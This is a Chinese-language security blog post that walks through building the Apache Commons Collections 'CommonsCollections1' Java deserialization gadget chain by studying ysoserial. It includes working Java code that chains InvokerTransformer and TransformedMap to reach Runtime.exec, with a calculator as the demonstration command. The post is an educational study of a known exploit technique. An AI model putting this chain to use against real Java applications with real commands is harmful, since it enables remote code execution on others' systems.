<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="学习CommonsCollections Gadgets1构造"><meta name="keywords" content="Java安全"><meta name="author" content="白袍"><meta name="copyright" content="白袍"><title>学习CommonsCollections Gadgets1构造 | 白袍的小行星</title><link rel="shortcut icon" href="/img/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="白袍的小行星" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#环境"><span class="toc-number">1.</span> <span class="toc-text">环境</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#基础知识"><span class="toc-number">2.</span> <span class="toc-text">基础知识</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CommonsCollections-1"><span class="toc-number">3.</span> <span class="toc-text">CommonsCollections 1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#TransformedMap"><span class="toc-number">3.1.</span> <span class="toc-text">TransformedMap</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/57424ce0a622b132.jpg"></div><div class="author-info__name text-center">白袍</div><div class="author-info__description text-center">莫忘少年凌云志，曾许天下第一流！</div><div class="follow-button"><a href="https://github.com/evilAdan0s" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">27</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">10</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" href="http://www.d-rose.cn/" target="_blank" rel="noopener">D-R0s1</a><a class="author-info-links__name text-center" href="http://www.free04k.cn/" target="_blank" rel="noopener">Free04k</a><a class="author-info-links__name text-center" href="https://www.sqlsec.com/" target="_blank" rel="noopener">国光</a><a class="author-info-links__name text-center" href="https://zgao.top/" target="_blank" rel="noopener">Zgao</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/back.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">白袍的小行星</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">学习CommonsCollections Gadgets1构造</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-06</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p><code>CommonsCollections Gadgets1</code>构造是很好的学习Java反序列化的案例，所以这次想通过调试<code>ysoserial</code>来学习<code>CommonsCollections Gadgets1</code>的手动构造。</p>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><p>我是用的IDEA，下载好<code>ysoserial</code>，以<code>Maven</code>的方式导入，等待依赖下载完毕。</p>
<p>因为<code>CommonsCollections1</code>调试需要Java 7，得安装之后选定一下：</p>
<p><img src="/images/QQ20200731-113140@2x.png" alt=""></p>
<p>Mac下Java安装目录可以通过命令<code>/usr/libexec/java_home -V</code>查看：</p>
<p><img src="/images/QQ20200731-113248@2x.png" alt=""></p>
<h1 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h1><p><code>Apache Commons Collections</code>是Java中应用广泛的一个库，包括Weblogic、JBoss、WebSphere、Jenkins等知名大型Java应用都使用了这个库。</p>
<p>在此库里有一个<code>Transformer</code>接口，功能是将一个对象转换成另一个对象，源码如下：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">Transformer</span> </span>&#123;</span><br><span class="line">    <span class="function">Object <span class="title">transform</span><span class="params">(Object var1)</span></span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>IDEA里，点击接口源码处左边的小绿点即可看到有哪些类实现了此接口：</p>
<p><img src="/images/QQ20200731-142538@2x.png" alt=""></p>
<p>在<code>InvokerTransformer</code>类里的构造方法和<code>transform</code>方法如下：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">InvokerTransformer</span><span class="params">(String methodName, Class[] paramTypes, Object[] args)</span> </span>&#123;</span><br><span class="line">       <span class="keyword">this</span>.iMethodName = methodName;</span><br><span class="line">       <span class="keyword">this</span>.iParamTypes = paramTypes;</span><br><span class="line">       <span class="keyword">this</span>.iArgs = args;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">transform</span><span class="params">(Object input)</span> </span>&#123;</span><br><span class="line">       ......</span><br><span class="line">       Class cls = input.getClass();</span><br><span class="line">       Method method = cls.getMethod(<span class="keyword">this</span>.iMethodName, <span class="keyword">this</span>.iParamTypes);</span><br><span class="line">       <span class="keyword">return</span> method.invoke(input, <span class="keyword">this</span>.iArgs);</span><br><span class="line">       ......     </span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>构造方法有三个参数，分别是方法名，参数类型和参数，在<code>transform</code>方法中利用反射和它们就可以调用任意对象的函数。</p>
<p>我们尝试用它来进行命令执行：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">MyInvoke</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span></span>&#123;</span><br><span class="line">        InvokerTransformer myInvoke = new InvokerTransformer("exec", new Class[]&#123;String.class&#125;, new Object[]&#123;new String("open -na Calculator")&#125;);</span><br><span class="line">        myInvoke.transform(Runtime.getRuntime());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/QQ20200731-154931@2x.png" alt=""></p>
<h1 id="CommonsCollections-1"><a href="#CommonsCollections-1" class="headerlink" title="CommonsCollections 1"></a>CommonsCollections 1</h1><p>了解了大概的原理之后，就来尝试寻找利用链吧。</p>
<p>我们已经得到命令执行的终点，接下来就该沿着链条向上回溯，找到自动调用<code>transform</code>方法的#类，<code>ysoserial</code>中使用的是<code>LazyMap</code>类，我们手动就使用另一个<code>TransformedMap</code>类。</p>
<h2 id="TransformedMap"><a href="#TransformedMap" class="headerlink" title="TransformedMap"></a>TransformedMap</h2><p>在<code>TransformedMap</code>类中调用<code>transform()</code>之处如下：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> Object <span class="title">checkSetValue</span><span class="params">(Object value)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.valueTransformer.transform(value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>本类中没有调用处，但是在其父类<code>AbstractInputCheckedMapDecorator</code>中有一个重写的<code>setValue</code>方法：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//AbstractInputCheckedMapDecorator.class</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">setValue</span><span class="params">(Object value)</span> </span>&#123;</span><br><span class="line">    value = <span class="keyword">this</span>.parent.checkSetValue(value);</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">super</span>.entry.setValue(value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在<code>TransformedMap</code>的构造方法中调用了其父类<code>AbstractInputCheckedMapDecorator</code>的构造方法：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//TransformedMap.class</span></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="title">TransformedMap</span><span class="params">(Map map, Transformer keyTransformer, Transformer valueTransformer)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">super</span>(map);</span><br><span class="line">    <span class="keyword">this</span>.keyTransformer = keyTransformer;</span><br><span class="line">    <span class="keyword">this</span>.valueTransformer = valueTransformer;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>AbstractInputCheckedMapDecorator</code>的有参构造方法中又调用了它的父类<code>AbstractMapDecorator</code>的构造方法：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//AbstractInputCheckedMapDecorator.class</span></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="title">AbstractInputCheckedMapDecorator</span><span class="params">(Map map)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">super</span>(map);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>而<code>AbstractMapDecorator</code>则是对接口<code>Map</code>的实现，所以当使用<code>Map</code>的<code>setValue</code>方法时，<code>checkSetValue</code>方法就会被调用。从<code>Map</code>的<code>setValue</code>方法调用链里也可以看到：</p>
<p><img src="/images/QQ20200731-173024@2x.png" alt=""></p>
<p>只要Map对象的Key和Value被修改，那么<code>setValue</code>方法就会被调用。</p>
<p>再来看一个工具人类<code>ChainedTransformer</code>，它也调用了<code>transform</code>方法：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">transform</span><span class="params">(Object object)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="keyword">this</span>.iTransformers.length; ++i) &#123;</span><br><span class="line">        object = <span class="keyword">this</span>.iTransformers[i].transform(object);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> object;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>它可以迭代调用反射，那么我们可以传入多个 <code>InvokerTransformer</code>实例来组成一个 <code>ChainedTransformer</code> 对象，让它来帮我们逐个调用这些实例的<code>transform</code>方法。</p>
<p>还要介绍一个<code>ConstantTransformer</code>类，它是用来返回执行命令的对象的：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">ConstantTransformer</span><span class="params">(Object constantToReturn)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.iConstant = constantToReturn;</span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">transform</span><span class="params">(Object input)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.iConstant;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>写个例子来串一下：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span></span>&#123;</span><br><span class="line">    Transformer[] transformers = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">        <span class="keyword">new</span> ConstantTransformer(Runtime<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line">        new InvokerTransformer("getMethod", new Class[]&#123;String.class,Class[].class&#125;,</span><br><span class="line">            <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>]&#125;),</span><br><span class="line">        new InvokerTransformer("invoke", new Class[]&#123;Object.class,Object[].class&#125;,</span><br><span class="line">            <span class="keyword">new</span> Object[]&#123;<span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>]&#125;),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]&#123;String<span class="class">.<span class="keyword">class</span>&#125;,</span></span><br><span class="line">            new Object[]&#123;"calc"&#125;)</span><br><span class="line">    &#125;;</span><br><span class="line">    Transformer chain = <span class="keyword">new</span> ChainedTransformer(transformers) ;</span><br><span class="line">    chain.transform(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>来解释一下，大体逻辑是我们构建一个<code>Transformer</code>数组对象，然后利用<code>ChainedTransformer</code>来逐个调用里面对象的<code>transform</code>方法。</p>
<p>第一个对象，即返回了传入的对象；</p>
<p>第二个对象，获取<code>getMethod</code>方法，参数为<code>getRuntime</code>；</p>
<p>第三个对象，获取<code>invoke</code>方法；</p>
<p>第四个对象，获取<code>exec</code>方法，参数为<code>calc</code>.</p>
<p>此处可能略绕，需要好好思考一下。</p>
<p>好了，该到最终环节，我们梳理一下整个链条：将一个包含执行链的<code>chainedTransformer</code>对象转换成<code>Map</code>对象，最后修改此对象的值，即可成功触发。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">            <span class="keyword">new</span> ConstantTransformer(Runtime<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line">            new InvokerTransformer("getMethod", new Class[] &#123; String.class, Class[].class &#125;, new Object[] &#123;"getRuntime", new Class[0] &#125;),</span><br><span class="line">            new InvokerTransformer("invoke", new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, new Object[0]&#125;),</span><br><span class="line">            new InvokerTransformer("exec", new Class[]&#123;String.class&#125;, new Object[]&#123;"open -na Calculator"&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        Transformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">        Map inMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        inMap.put(<span class="string">"key"</span>, <span class="string">"value"</span>);</span><br><span class="line">        Map outMap = TransformedMap.decorate(inMap, <span class="keyword">null</span>, chainedTransformer);<span class="comment">//生成</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (Iterator iterator = outMap.entrySet().iterator(); iterator.hasNext();)&#123;</span><br><span class="line">            Map.Entry entry = (Map.Entry) iterator.next();</span><br><span class="line">            entry.setValue(<span class="string">"123"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>







</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">白袍</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://eviladan0s.github.io/2020/07/31/learn-CommonsCollections1/">https://eviladan0s.github.io/2020/07/31/learn-CommonsCollections1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/weixin.png"><div class="post-qr-code__desc">感谢支持</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/09/05/python-ssti/"><i class="fa fa-chevron-left">  </i><span>CTF中常见Python题型SSTI</span></a></div><div class="next-post pull-right"><a href="/2020/07/30/java-sec-newbee/"><span>Java安全基础</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/img/back.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By 白袍</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>